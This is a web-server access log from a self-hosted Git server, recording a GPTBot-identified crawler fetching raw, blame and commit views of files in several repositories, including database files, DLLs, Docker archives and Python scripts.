"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" +[17/Feb/2026:14:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" +[17/Feb/2026:14:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" +[17/Feb/2026:14:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" +[17/Feb/2026:14:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14348] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" +[17/Feb/2026:14:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14347] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" +[17/Feb/2026:14:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 5813273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:14:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:14:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 5813273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:14:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 10125618] [Gzip 22.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:14:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 10125675] [Gzip 22.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:14:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:14:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:14:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" +[17/Feb/2026:14:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" +[17/Feb/2026:14:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:14:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:14:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" +[17/Feb/2026:14:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:14:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" +[17/Feb/2026:14:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" +[17/Feb/2026:14:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" +[17/Feb/2026:14:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:14:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:14:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10282] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:14:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10109] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" +[17/Feb/2026:14:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10079] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" +[17/Feb/2026:14:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:14:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10527] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm" +[17/Feb/2026:14:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:14:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" [Client 74.7.227.38] [Length 12921] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" +[17/Feb/2026:14:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" [Client 74.7.227.38] [Length 12584] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:14:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" [Client 74.7.227.38] [Length 15636] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:14:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" [Client 74.7.227.38] [Length 12949] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:14:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" [Client 74.7.227.38] [Length 12455] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:14:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71828] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" [Client 74.7.227.38] [Length 16313] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" +[17/Feb/2026:14:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12997] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:14:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fproject.nuget.cache" [Client 74.7.227.38] [Length 22614] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:14:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" [Client 74.7.227.38] [Length 11045] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" +[17/Feb/2026:14:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11673] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" +[17/Feb/2026:14:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" [Client 74.7.227.38] [Length 9838] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" +[17/Feb/2026:14:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" [Client 74.7.227.38] [Length 10535] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" +[17/Feb/2026:14:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" +[17/Feb/2026:14:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" +[17/Feb/2026:14:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" [Client 74.7.227.38] [Length 10098] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" +[17/Feb/2026:14:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" [Client 74.7.227.38] [Length 12463] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" +[17/Feb/2026:14:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" [Client 74.7.227.38] [Length 13575] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" +[17/Feb/2026:14:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12776] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153442] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 